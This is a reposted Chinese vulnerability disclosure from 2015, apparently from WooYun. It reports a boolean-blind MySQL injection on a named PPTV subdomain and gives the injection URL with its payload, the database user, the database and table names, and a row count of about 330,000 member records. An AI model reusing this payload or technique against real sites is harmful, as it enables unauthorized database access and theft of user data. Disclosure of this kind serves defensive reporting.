记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

PPTV某站点MySQL注射(members表33万数据)

2015-01-07 15:05

注入点:

code 区域
http://ksf.zone.pptv.com/post?id=1 AND length(user())=19



参数id可注入。 MySQL bool blind.

还有个域名: http://expo2010.pptv.com/

漏洞证明:

code 区域
current user:    'pp_ae@10.%'



code 区域
available databases [10]:

[*] information_schema

[*] pp_hezuo_swarovski

[*] pp_zo_inyy

[*] pp_zo_vmei

[*] pp_zone

[*] pp_zone_public

[*] pplive_ctf

[*] pplive_heiren

[*] pplive_kefu

[*] pplive_rss



kefu表:

code 区域
Database: pplive_kefu

[103 tables]

+----------------------+

| cdb_access |

| cdb_activities |

| cdb_activityapplies |

| cdb_addons |

| cdb_adminactions |

| cdb_admincustom |

| cdb_admingroups |

| cdb_adminnotes |

| cdb_adminsessions |

| cdb_advertisements |

| cdb_announcements |

| cdb_attachmentfields |

| cdb_attachments |

| cdb_attachpaymentlog |

| cdb_attachtypes |

| cdb_banned |

| cdb_bbcodes |

| cdb_caches |

| cdb_creditslog |

| cdb_crons |

| cdb_debateposts |

| cdb_debates |

| cdb_failedlogins |

| cdb_faqs |

| cdb_favoriteforums |

| cdb_favorites |

| cdb_favoritethreads |

| cdb_feeds |

| cdb_forumfields |

| cdb_forumlinks |

| cdb_forumrecommend |

| cdb_forums |

| cdb_imagetypes |

| cdb_invites |

| cdb_itempool |

| cdb_magiclog |

| cdb_magicmarket |

| cdb_magics |

| cdb_medallog |

| cdb_medals |

| cdb_memberfields |

| cdb_membermagics |

| cdb_memberrecommend |

| cdb_members |

| cdb_memberspaces |

| cdb_moderators |

| cdb_modworks |

| cdb_mytasks |

| cdb_navs |

| cdb_onlinelist |

| cdb_onlinetime |

| cdb_orders |

| cdb_paymentlog |

| cdb_pluginhooks |

| cdb_plugins |

| cdb_pluginvars |

| cdb_polloptions |

| cdb_polls |

| cdb_postposition |

| cdb_posts |

| cdb_profilefields |

| cdb_projects |

| cdb_promotions |

| cdb_prompt |

| cdb_promptmsgs |

| cdb_prompttype |

| cdb_ranks |

| cdb_ratelog |

| cdb_regips |

| cdb_relatedthreads |

| cdb_reportlog |

| cdb_request |

| cdb_rewardlog |

| cdb_rsscaches |

| cdb_searchindex |

| cdb_sessions |

| cdb_settings |

| cdb_smilies |

| cdb_spacecaches |

| cdb_stats |

| cdb_statvars |

| cdb_styles |

| cdb_stylevars |

| cdb_tags |

| cdb_tasks |

| cdb_taskvars |

| cdb_templates |

| cdb_threads |

| cdb_threadsmod |

| cdb_threadtags |

| cdb_threadtypes |

| cdb_tradecomments |

| cdb_tradelog |

| cdb_tradeoptionvars |

| cdb_trades |

| cdb_typemodels |

| cdb_typeoptions |

| cdb_typeoptionvars |

| cdb_typevars |

| cdb_usergroups |

| cdb_validating |

| cdb_warnings |

| cdb_words |

+----------------------+



members表有30多万数据:

code 区域
Database: pplive_kefu

+-------------+---------+

| Table | Entries |

+-------------+---------+

| cdb_members | 331865 |

+-------------+---------+



到此为止,未进一步利用。

修复方案:

转换,过滤


知识来源: www.wooyun.org/bugs/wooyun-2015-090129

阅读:84727 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“PPTV某站点MySQL注射(members表33万数据)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云